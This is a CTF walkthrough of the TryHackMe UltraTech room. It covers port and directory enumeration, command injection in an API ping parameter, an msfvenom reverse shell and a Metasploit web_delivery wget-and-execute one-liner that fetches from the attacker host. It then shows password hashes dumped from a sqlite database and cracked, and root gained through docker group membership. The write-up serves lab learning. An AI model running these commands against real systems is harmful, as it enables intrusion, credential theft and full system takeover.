UltraTech Tryhackme

Enumeration

alwannn 4K
7 min read, Dec 8, 2022
# Nmap 7.92 scan initiated Wed Dec  7 12:08:25 2022 as: nmap -p- -sV -sC -oN nmap-full.txt -T4 10.10.89.69
Nmap scan report for 10.10.89.69
Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:66:89:85:e7:05:c2:a5:da:7f:01:20:3a:13:fc:27 (RSA)
| 256 c3:67:dd:26:fa:0c:56:92:f3:5b:a0:b3:8d:6d:20:ab (ECDSA)
|_ 256 11:9b:5a:d6:ff:2f:e4:49:d2:b5:17:36:0e:2f:1d:2f (ED25519)
8081/tcp open http Node.js Express framework
31331/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-cors: HEAD GET POST PUT DELETE PATCH
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Found 4 open ports. Focus on 8081, which runs Node.js, and 31331, which runs an Apache web server.

Crawling port 8081, which serves the API. Let's try brute-forcing this host for file/folder information.

Brute-forcing port 8081 turned up 2 interesting directories:

┌──(wooxx㉿wanzroot)-[~/Documents/ultratech-thm]
└─$ gobuster dir -u http://10.10.243.157:8081/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.243.157:8081/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/08 12:08:38 Starting gobuster in directory enumeration mode
===============================================================
Progress: 1279 / 207644 (0.62%)[ERROR] 2022/12/08 12:10:06 [!] Get "http://10.10.243.157:8081/libraries": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/auth (Status: 200) [Size: 39]
/ping (Status: 500) [Size: 1094]

Brute-forcing port 31331 turned up some interesting directories:

┌──(wooxx㉿wanzroot)-[~]
└─$ gobuster dir -u http://10.10.243.157:31331/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.243.157:31331/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/08 12:13:17 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 324] [--> http://10.10.243.157:31331/images/]
/css (Status: 301) [Size: 321] [--> http://10.10.243.157:31331/css/]
/js (Status: 301) [Size: 320] [--> http://10.10.243.157:31331/js/]
/javascript (Status: 301) [Size: 328] [--> http://10.10.243.157:31331/javascript/]

Let's test port 8081 first. Browsing to the ping directory:

We get an error. Perhaps ping requires a parameter.

Next, the auth directory.

This one requires credentials. Next, check the brute-force results on port 31331.

Found something interesting in the API JS file: it looks like we can ping through the ip parameter. Let's try it.

Exploitation

It connects and returns a reply. After trying several strings, we finally got a directory listing, which contains a database file.

Next we'll build a reverse shell with msfvenom, serve it with Python, download it with wget and run it.

┌──(wooxx㉿wanzroot)-[~/Documents/ultratech-thm]
└─$ msfvenom -p cmd/unix/reverse_bash LHOST=10.18.3.26 LPORT=4444 -f raw > shell.sh
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes

1. Set up the listener

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/handler) > set LHOST 10.18.3.26
LHOST => 10.18.3.26
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.18.3.26:4444

2. Python server

Create a simple web server with Python:

┌──(wooxx㉿wanzroot)-[~/Documents/ultratech-thm]
└─$ sudo python3 -m http.server 80
[sudo] password for wooxx:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

3. Download on the target machine

┌──(wooxx㉿wanzroot)-[~/Documents/ultratech-thm]
└─$ sudo python3 -m http.server 80
[sudo] password for wooxx:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.243.157 - - [08/Dec/2022 12:30:30] "GET /shell.sh HTTP/1.1" 200 -

The server received the download request with 200 OK.

4. Run the file

[*] Started reverse TCP handler on 10.18.3.26:4444 
[*] Command shell session 1 opened (10.18.3.26:4444 -> 10.10.243.157:57984) at 2022-12-08 12:31:58 -0500

id
uid=1002(www) gid=1002(www) groups=1002(www)

And we're connected to the server. Let's upgrade the shell with the web_delivery module.

msf6 > search web_del

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution
1 exploit/multi/script/web_delivery 2013-07-19 manual No Script Web Delivery


Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/script/web_delivery

msf6 > use 1
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > show targets

Exploit targets:

Id Name
-- ----
0 Python
1 PHP
2 PSH
3 Regsvr32
4 pubprn
5 SyncAppvPublishingServer
6 PSH (Binary)
7 Linux
8 Mac OS X


msf6 exploit(multi/script/web_delivery) > set target 7
target => 7
msf6 exploit(multi/script/web_delivery) > grep meterpreter show payload
msf6 exploit(multi/script/web_delivery) > grep meterpreter show payloads
7 payload/linux/x64/meterpreter/bind_tcp normal No Linux Mettle x64, Bind TCP Stager
8 payload/linux/x64/meterpreter/reverse_tcp normal No Linux Mettle x64, Reverse TCP Stager
9 payload/linux/x64/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
10 payload/linux/x64/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
11 payload/linux/x64/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
23 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
24 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
25 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
26 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
27 payload/linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
28 payload/linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
29 payload/linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
30 payload/linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
31 payload/linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
32 payload/linux/x86/meterpreter_reverse_http normal No Linux Meterpreter, Reverse HTTP Inline
33 payload/linux/x86/meterpreter_reverse_https normal No Linux Meterpreter, Reverse HTTPS Inline
34 payload/linux/x86/meterpreter_reverse_tcp normal No Linux Meterpreter, Reverse TCP Inline
msf6 exploit(multi/script/web_delivery) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set LHOST 10.18.3.26
LHOST => 10.18.3.26
msf6 exploit(multi/script/web_delivery) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/script/web_delivery) >
[*] Started reverse TCP handler on 10.18.3.26:5555
[*] Using URL: http://10.18.3.26:8080/VIjlJmHErNk961
[*] Server started.
[*] Run the following command on the target machine:
wget -qO UmIE2Kej --no-check-certificate http://10.18.3.26:8080/VIjlJmHErNk961; chmod +x UmIE2Kej; ./UmIE2Kej& disown
[*] 10.10.243.157 web_delivery - Delivering Payload (207 bytes)
[*] Sending stage (989032 bytes) to 10.10.243.157
[*] Meterpreter session 1 opened (10.18.3.26:5555 -> 10.10.243.157:44670) at 2022-12-08 12:37:13 -0500

msf6 exploit(multi/script/web_delivery) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer : 10.10.243.157
OS : Ubuntu 18.04 (Linux 4.15.0-46-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >

Good. We have a meterpreter shell.

meterpreter > ls -la
Listing: /home/www/api
======================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100775/rwxrwxr-x 207 fil 2022-12-08 12:36:57 -0500 UmIE2Kej
100644/rw-r--r-- 1750 fil 2019-03-22 14:07:09 -0400 index.js
040775/rwxrwxr-x 4096 dir 2019-03-22 14:07:35 -0400 node_modules
100644/rw-r--r-- 42702 fil 2019-03-22 14:07:09 -0400 package-lock.json
100644/rw-r--r-- 370 fil 2019-03-22 14:07:09 -0400 package.json
100664/rw-rw-r-- 74 fil 2022-12-08 12:25:43 -0500 shell.sh
100664/rw-rw-r-- 103 fil 2019-03-22 09:50:14 -0400 start.sh
100644/rw-r--r-- 8192 fil 2019-03-22 14:07:09 -0400 utech.db.sqlite

meterpreter >

Looking at the directory listing, the sqlite file looks worth analysing. Download it to the local machine.

Privilege Escalation

meterpreter > download utech.db.sqlite
[*] Downloading: utech.db.sqlite -> /home/wooxx/Documents/ultratech-thm/utech.db.sqlite
[*] skipped : utech.db.sqlite -> /home/wooxx/Documents/ultratech-thm/utech.db.sqlite
meterpreter >

Let's extract the database:

┌──(wooxx㉿wanzroot)-[~/Documents/ultratech-thm]
└─$ sqlite3 utech.db.sqlite
SQLite version 3.39.2 2022-07-21 15:24:47
Enter ".help" for usage hints.
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE users (
login Varchar,
password Varchar,
type Int
);
INSERT INTO users VALUES('admin','0d0ea5111e3c1def594c1684e3b9be84',0);
INSERT INTO users VALUES('r00t','f357a0c52799563c7c7b76c1e7543a32',0);
COMMIT;
sqlite>

Let's crack the password hashes with CrackStation.

Found them. Check how many users are in the home directory:

meterpreter > ls /home
Listing: /home
==============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040755/rwxr-xr-x 4096 dir 2019-03-22 14:17:06 -0400 lp1
040755/rwxr-xr-x 4096 dir 2019-03-22 11:55:31 -0400 r00t
040755/rwxr-xr-x 4096 dir 2019-03-22 14:15:48 -0400 www

meterpreter >

Since the hash matched, this is probably the r00t user's password. Try logging in:

meterpreter > shell
Process 2256 created.
Channel 2 created.
python3 -c 'import pty;pty.spawn("/bin/bash")'
www@ultratech-prod:~/api$ su r00t
su r00t
Password: n100906

r00t@ultratech-prod:/home/www/api$ id
id
uid=1001(r00t) gid=1001(r00t) groups=1001(r00t),116(docker)
r00t@ultratech-prod:/home/www/api$

And we're in as the r00t user.

We're in the docker group, which is interesting. Check the docker images:

r00t@ultratech-prod:/home/www/api$ docker images
docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
bash latest 495d6437fc1e 3 years ago 15.8MB
ir00t@ultratech-prod:/home/www/api$

A bash container. Heading to GTFOBins to look for an exploit.

Swap in the image name we have:

r00t@ultratech-prod:~$ docker run -v /:/mnt --rm -it bash chroot /mnt sh
docker run -v /:/mnt --rm -it bash chroot /mnt sh
# id
id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# whoami
whoami
root
#

Yep, and now we control the system with the highest level of access.
